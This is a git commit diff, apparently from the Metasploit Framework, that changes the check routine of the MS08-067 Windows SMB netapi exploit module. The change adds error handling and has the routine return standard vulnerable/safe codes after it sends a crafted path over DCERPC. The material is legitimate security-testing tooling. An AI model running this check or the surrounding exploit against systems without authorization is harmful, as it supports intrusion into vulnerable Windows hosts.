return the appropriate check codes instead of just printing stuff. add some error checks to avoid stack traces against samba and non-existant hosts

git-svn-id: file:///home/svn/framework3/trunk@12314 4d416f70-5f16-0410-b530-b9f4589650da
2011-04-13 23:26:07 +00:00 · 2011-04-13 23:26:07 +00:00 · b5e0962e3e
parent d6edeebcef
commit b5e0962e3e
1 changed files with 21 additions and 9 deletions
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@ -957,8 +957,13 @@ class Metasploit3 < Msf::Exploit::Remote
 	end

 	def check
-		connect()
-		smb_login()
+		begin
+			connect()
+			smb_login()
+		rescue Rex::ConnectionError => e
+			print_error("Connection failed: #{e.class}: #{e}")
+			return
+		end

 		#
 		# Build the malicious path name
@ -977,7 +982,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		handle = dcerpc_handle( '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
 			'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
 		)
-		dcerpc_bind(handle)
+
+		begin
+			# Samba doesn't have this handle and returns an ErrorCode
+			dcerpc_bind(handle)
+		rescue Rex::Proto::SMB::Exceptions::ErrorCode
+			return Msf::Exploit::CheckCode::Safe
+		end

 		print_status("Verifying vulnerable status... (path: 0x%08x)" % path.length)

@ -992,16 +1003,17 @@ class Metasploit3 < Msf::Exploit::Remote
 		resp = dcerpc.call(0x1f, stub)
 		error = resp[4,4].unpack("V")[0]

-		if (error == 0x0052005c) # \R :)
-			print_status("System is vulnerable.")
-		else
-			print_status("System is invulnerable (status: 0x%08x)" % error)
-		end
-
 		# Cleanup
 		simple.client.close
 		simple.client.tree_disconnect
 		disconnect
+
+		if (error == 0x0052005c) # \R :)
+			return Msf::Exploit::CheckCode::Vulnerable
+		else
+			print_status("System is not vulnerable (status: 0x%08x)" % error) if error
+			return Msf::Exploit::CheckCode::Safe
+		end
 	end
 end